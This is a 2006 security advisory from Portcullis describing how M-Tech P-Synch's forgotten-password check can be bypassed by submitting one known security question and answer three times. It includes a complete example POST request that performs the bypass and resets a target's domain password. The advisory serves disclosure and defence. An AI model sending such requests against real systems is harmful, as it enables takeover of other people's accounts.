Portcullis Security Advisory No. 06-003

Vulnerable System:

M-Tech P-Synch Password Management Software

Version: 6.2.8

Other versions: Unknown.

Vulnerability Title:

P-Synch permits reduced authentication complexity in "Forgotton Password" mechanism.

Vulnerability discovery and development:

Portcullis Security Testing Services discovered this vulnerability.

Affected systems:

The vulnerability was found and verified against a system running on a Windows 2000 platform.

Vulnerability Detail:

It was noted that, in addition to the application failing to check that the supplied POST request corresponds to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Assuming that the presented answer is correct, the application authenticates the user successfully.

An example POST is detailed below:

POST /nph-psf.exe HTTP/1.1

Host: 192.168.1.1

Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: https://192.168.1.1/nph-psf.exe

Content-Type: application/x-www-form-urlencoded

Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=2&_QUES_1=QD-42ae7b35-02484&_VALUE_2=2&_QUES_2=QD-42ae7b35-02484&SUBMIT-QA.x=45&SUBMIT-QA.y=8

Impact:

In conjunction with the discovery that the app fails to track which questions have been asked, it is possible for a malicious user who knows the answer to only one of the security questions associated with the target user to authenticate to the P-synch application and modify the target users' domain password.

Exploit:

None required.

Vendor Status:

Notified via email 17 February 2006

Disclosure Policy:

Portcullis' Disclosure POlicy can be viewed here.

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.